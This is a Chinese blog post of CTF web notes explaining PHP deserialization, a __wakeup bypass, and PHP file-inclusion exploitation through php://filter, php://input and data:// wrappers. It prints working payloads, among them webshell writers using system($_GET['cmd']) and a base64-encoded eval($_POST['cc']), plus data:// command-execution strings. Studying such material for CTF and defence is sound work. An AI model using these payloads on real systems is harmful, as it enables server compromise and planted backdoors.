ctf web-部分

原创 已于 2024-07-30 11:04:16 修改 · 1.1k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2024-04-29 01:29:12 首次发布
本文介绍了PHP反序列化和文件包含相关知识。反序列化通过serialize()和unserialize()函数实现,还介绍了常见魔法函数及__wakeup()绕过方法。PHP文件包含漏洞允许攻击者执行恶意操作,文中讲解了php://filter、php://input、data、file等协议在漏洞利用中的用法。

**

web基础知识

**

*一.反序列化

在PHP中,反序列化通常是指将序列化后的字节转换回原始的PHP对象或数据结构的过程。PHP中的序列化和反序列化通过serialize()和unserialize()函数实现。

1.序列化serialize()

序列化说通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象:
class S{
public $test=“pikachu”;
}
s=newS();//创建一个对象serialize(s=new S(); //创建一个对象 serialize(s=newS();//创建一个对象serialize(s); //把这个对象进行序列化
序列化后得到的结果是这个样子的:O:1:“S”:1:{s:4:“test”;s:7:“pikachu”;}
O:代表object
1:代表对象名字长度为一个字符
S:对象的名称
1:代表对象里面有一个变量
s:数据类型
4:变量名称的长度
test:变量名称
s:数据类型
7:变量值的长度
pikachu:变量值

2.反序列化unserialize()

就是把被序列化的字符串还原为对象,然后在接下来的代码中继续使用。
$u=unserialize(“O:1:“S”:1:{s:4:“test”;s:7:“pikachu”;}”);
echo $u->test; //得到的结果为pikachu

3.PHP常见魔法函数

(1)__wakeup()
在PHP中如果需要进行反序列化,会先检查类中是否存在_wakeup()函数,如果存在,则会先调用此类方法,预先准备对象需要的资源。
(2)__sleep()
使用serialize时触发
(3)__destruct()
在对象的所有引用都被删除或类被销毁时自动调用
(4)__construct()
此函数会在创建一个类的实例时自动调用
(5)__toString()
此函数会在类被当作字符串时调用
(6)__get()
在读取不可访问的属性值时自动调用,例如读取私有变量
(7)__call()
调用未定义的方法时调用,例如调用实例化类中未定义的方法

4.序列化其属性

序列化对象:
private变量会被序列化为:\x00类名\x00变量名
protected变量会被序列化为: \x00*\x00变量名
public变量会被序列化为:变量名

5.__wakeup()绕过

版本限制
PHP5:<5.6.25
PHP7:<7.0.10
当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行
只需将O:1:“S”:1:{s:4:“test”;s:7:“pikachu”;}改成O:1:“S”:2:{s:4:“test”;s:7:“pikachu”;}即可绕过wakeup()

*二.PHP文件包含

PHP文件包含漏洞(File Inclusion Vulnerability)是一种安全漏洞,允许攻击者在应用程序中执行恶意的文件包含操作。这种漏洞通常出现在开发人员使用了不安全的文件包含函数时,例如include()、require()、include_once()、require_once()等,并且未正确过滤用户提供的输入。

1.php://filter伪协议

存在文件包含漏洞时,我们可以用php://filter进行文件的读取和写入,如读取flag.php文件,“?file=php://filter/read=convert.base64-encode/resource=flag.php”

2.php://input 协议

存在文件包含漏洞时,我们可以用php://input 命令执行也可直接写webshell

<?php fputs(fopen('my_shell.php','w'),'<?php system($_GET["cmd"]);?>');?>

#post方式提交base编码利用密码cc
<?php 
echo file_put_contents("test.php",base64_decode("PD9waHAgZXZhbCgkX1BPU1RbJ2NjJ10pPz4="));
?>

通常用法:执行<?php system("ls") ?>可查看文件,通常用来查找和读取flag文件位置,也配合php://filter进行读取
在这里插入图片描述

3.data 协议

其实data协议和input协议差不多,只是data是get方法,input是post方法,data伪协议配合命令来读取到的文件会在 PHP 脚本生成的 HTML 页面中显示。
用法:
读取文件:?c=data://text/plain,<?php system('cat fla*.php');?>
查找文件:?c=data://text/plain,<?php system('ls');?>
利用编码:data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
shell:data://text/plain,<?php eval($_POST[pass]);?>

4.file协议

file伪协议
file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。

在这里插入图片描述

AI_SumSky
关注
文件包含漏洞复现
ABUG
09-22 1015
文件包含攻击是一种利用Web应用程序的文件包含功能来执行任意文件的攻击方式。通过漏洞,攻击者可以读取敏感文件、执行恶意代码,甚至完全控制目标服务器。防御这种攻击的关键在于。
CTFHUB-web-信息泄漏
2401_84254530的博客
07-20 1457
Git是一个开源的分布式版本控制系统,在执行git init初始化目录的时候,会在当前目录下自动创建一个.git 目录,用来记录代码的变更记录等。通过了解知道vim缓存文件的后缀名为 .swp 根据提示我们知道flag在index.php中,而一般情况下vim缓存文件都是隐藏的,我们要找的他的flag就可以直接在.index.php后面跟一个.swp。这就引起了git泄露漏洞。但是我们在这么输入过后,得到的是“未找到”,但是却得到了一份文件,我们下载好这份文件,并使用记事本打开,就可以得到flag。
2024ctf-web -wp
2301_80915592的博客
11-22 2192
这个game就直接数组绕过,没什么说,然后two与flag限制了字符,所以要强碰撞,这⾥使⽤⼯具fastcoll,现将我们已知的写⼊⼀个txt⽂件中,在将⽂件拖到⼯具上就会⽣成两段加密后相等的md5值了,因为会纯在不可⻅字符,所以要将⽂件编码,这⾥给出php脚本,放在统⼀⽬录下,或者指定⽂件路径也⾏。结语:赣ctf对当时的我太难了,学了一段时间才来复现,也只是复现了一些php特性的题,后面的php反序列,还要什么pop本想钻一下,靶场关了,所以复现完这些代码题结束。}闭合前⾯的语句,然后⽤/*注释掉;
CTFHub----WEB-SSRF全网最详细的保姆级教程!!!!!!
2401_85783544的博客
07-24 1414
1.我们直接访问flag.php发现没有提交按钮,所以我们需要自己写一个按钮,前端的东西还是很容易修改 的, 把这个标签直接插入到下列html中去。2.在这里我们用的是第一个 file:///,去访问本地计算机中的文件,访问成功后看见有三个问号。file:///-------- 本地文件传输协议,主要用于访问本地计算机中的文件。3.,我们可以使用localhost来代替,也是本机的意思.成功获得flag。
CTFHUB-web-SQL注入
ookami6497的博客
11-29 1069
CTFHUB SQL
渗透学习-CTF-web-BUUCTF
qq_43696276的博客
01-17 2588
随着学习的不断深入,为了防止自己忘记之前所学的内容,于是我决定再不断的向下学习的同时做一些ctf的题来唤醒自己的记忆!!
CTFHub-Web--信息泄露
m0_69003772的博客
04-23 1846
CTF简介以及信息泄露下题目解题过程 文章目录 前言 一、基础知识 1.CTF简介 2.竞赛模式 2.1.理论知识 2.2.Jeopardy-解题 2.3.AwD-攻防模式 2.4.AWP-攻防增强 2.5.RHG-自动化[ AI自动化] 2.6RW-真实世界 2.7.KoH-抢占山头 2.8.Mix[混合] 3.比赛形式 3.1.线上 3.2.线下 4.题目类型 4.1.Web 4.2.Pwn 4.3.Reverse 4.4.C.
CTF----Web真零基础入门
热门推荐
B_cecretary的博客
01-17 2万+
前置知识: TCP/IP体系结构(IP和端口): IP是什么:是计算机在互联网上的唯一标识(坐标,代号),用于在互联网中寻找计算机。 访问网站时:域名会通过DNS(解析服务)解析成IP。 所以,互通的前提条件就是双方都能找到对方的IP地址。 内网(局域网)IP和公网(互联网)IP: 内网IP:路由以内的网络,可以连接互联网,但是互联网无法直接连接内网(需要端口映射) 如何判断自己的电脑是内网还是公网: --在本地电脑命令行输入jipconfig,ifconfig(Linux,macos)查看
CTF 竞赛必备神器 ——ctftools-all-in-one 深度解析与推荐》
wyb17870531028的博客
01-01 8270
在当今网络安全领域蓬勃发展的大背景下,网络安全竞赛(Capture The Flag,简称 CTF)已然成为精准衡量网络安全人才技能水平的关键平台。CTF 竞赛对参赛者有着颇高的要求,他们不仅要拥有扎实深厚的网络安全理论知识储备,更要具备在各种复杂的网络攻击和漏洞利用场景中迅速做出反应并有效应对的实际操作能力。然而,在实际的 CTF 竞赛进程中,参赛者们往往会遭遇诸多难题。例如在信息收集、漏洞利用、提权、文件传输等关键环节,这些过程通常需要借助多个不同的工具来协同完成,而且操作流程也较为复杂繁琐。
CTFHub - Web - 信息泄露 实战攻略
Yyexiaizhou的博客
08-13 844
CTFHub 是一个非常好的网络安全学习平台,在其中的 Web 部分,信息泄露是常见且重要的知识点。本文将详细介绍解决 CTFHub 中 Web - 信息泄露相关题目的过程。
网络安全-CTFWeb-HackBar(Chrome)
01-22
网络安全-CTFWeb-Hackbar(Chrome)的相关文件中,我们可以看到一系列与网络安全Web开发相关的文件。例如,permission.html、main.html和devtools.html文件可能分别是用于请求浏览器权限、展示主界面以及开发工具...
CTF一本通(ctf-all-in-one)
04-27
分类专题篇按照CTF竞赛的不同类别进行讲解,包括但不限于Pwn、Reverse、Web、Crypto、Misc、Mobile。其中Pwn类别介绍了常见于二进制漏洞利用的技巧,比如格式化字符串漏洞、整数溢出、栈溢出、返回导向编程(ROP)等...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8848
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
(Kriging-NSGA2)克里金模型结合多目标遗传算法求最优因变量及对应的最佳自变量组合研究(Matlab代码实现)
最新发布
12-17
(Kriging_NSGA2)克里金模型结合多目标遗传算法求最优因变量及对应的最佳自变量组合研究(Matlab代码实现)内容概要:本文介绍了克里金模型(Kriging)与多目标遗传算法NSGA-II相结合的方法,用于求解最优因变量及其对应的最佳自变量组合,并提供了完整的Matlab代码实现。该方法首先利用克里金模型构建高精度的代理模型,逼近复杂的非线性系统响应,减少计算成本;随后结合NSGA-II算法进行多目标优化,搜索帕累托前沿解集,从而获得多个最优折衷方案。文中详细阐述了代理模型构建、算法集成流程及参数设置,适用于工程设计、参数反演等复杂优化问题。此外,文档还展示了该方法在SCI一区论文中的复现应用,体现了其科学性与实用性。; 适合人群:具备一定Matlab编程基础,熟悉优化算法和数值建模的研究生、科研人员及工程技术人员,尤其适合从事仿真优化、实验设计、代理模型研究的相关领域工作者。; 使用场景及目标:①解决高计算成本的多目标优化问题,通过代理模型降低仿真次数;②在无法解析求导或函数高度非线性的情况下寻找最优变量组合;③复现SCI高水平论文中的优化方法,提升科研可信度与效率;④应用于工程设计、能源系统调度、智能制造等需参数优化的实际场景。; 阅读建议:建议读者结合提供的Matlab代码逐段理解算法实现过程,重点关注克里金模型的构建步骤与NSGA-II的集成方式,建议自行调整测试函数或实际案例验证算法性能,并配合YALMIP等工具包扩展优化求解能力。
FindAddress 读第三方程序的变量的原理
12-17
读第三方程序的变量的原理 2 https://flyfish.blog.youkuaiyun.com/article/details/155859130
PVE开启直通+CPU硬盘温度显示,风扇转速+一些群辉自用的小脚本
12-17
先展示下效果 https://pan.quark.cn/s/b85190ab5f38 ### pve虚拟机磁盘路径 ### 虚拟机路径 ### LXC路径 ### 无需借助任何软件直接转换openwrt的img文件为虚拟磁盘 ### PVE-LXC容器换源 ### pve显示信息
基于人脸识别的宿舍门禁管理系统的设计与实现源码.zip
12-17
基于人脸识别的宿舍门禁管理系统的设计与实现源码.zip
水下图像处理指标(uicm,uism,uiconm,uiqm)和图像处理指标(psnr,ssim)研究(Matlab代码实现)
12-17
水下图像处理指标(uicm,uism,uiconm,uiqm)和图像处理指标(psnr,ssim)研究(Matlab代码实现)
造价-技术与计量(土建)-精讲班-第17讲:第二章第二节:道路、桥梁、涵洞工程的分类、组成及构造(一)
12-17
2014造价-技术与计量(土建)-精讲班-第17讲:第二章第二节:道路、桥梁、涵洞工程的分类、组成及构造(一)
CTFweb-study
03-12
### CTF Web 安全挑战的学习资源 对于希望深入理解并参与CTF(夺旗竞赛)Web安全挑战的人来说,获取高质量的学习材料至关重要。这些资源不仅帮助参与者掌握基础概念和技术细节,还提供了实践机会来应用所学知识。 #### 推荐书籍与在线课程 一些优秀的书籍和在线平台专注于教授Web漏洞挖掘技巧以及防御措施。例如,《Web Application Hacker's Handbook》全面介绍了各种攻击向量及其对应的防护策略;Coursera上的《Cybersecurity Specialization》系列课程也涵盖了大量有关网络攻防的知识点[^1]。 #### 实践练习网站 为了更好地准备比赛中的实际操作部分,建议访问专门设计用于训练的安全测试环境。像HackTheBox、Try Hack Me这样的站点提供了一系列难度渐进的任务场景供玩家探索,而PWNABLE则更侧重于二进制逆向工程等方面的能力培养[^2]。 #### 社区交流论坛 加入活跃的技术讨论群组能够加速个人成长过程。Reddit下的r/netsec板块汇聚了许多信息安全爱好者分享见解;还有官方CTF赛事主办方设立的Discord服务器也是不错的选择之一,这里可以找到志同道合的朋友共同探讨难题解决方案。 ```python import requests def fetch_ctf_challenges(): url = 'https://example.com/challenges' response = requests.get(url) if response.status_code == 200: challenges = response.json() return challenges['data'] else: raise Exception('Failed to load data') challenges = fetch_ctf_challenges() print(challenges[:5]) # 打印前五个挑战题目概要信息 ``` 此段Python代码展示了如何通过API接口获取某一站点发布的最新CTF挑战列表,并打印其中部分内容作为示例展示给读者了解可能存在的交互形式。
评论 4
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值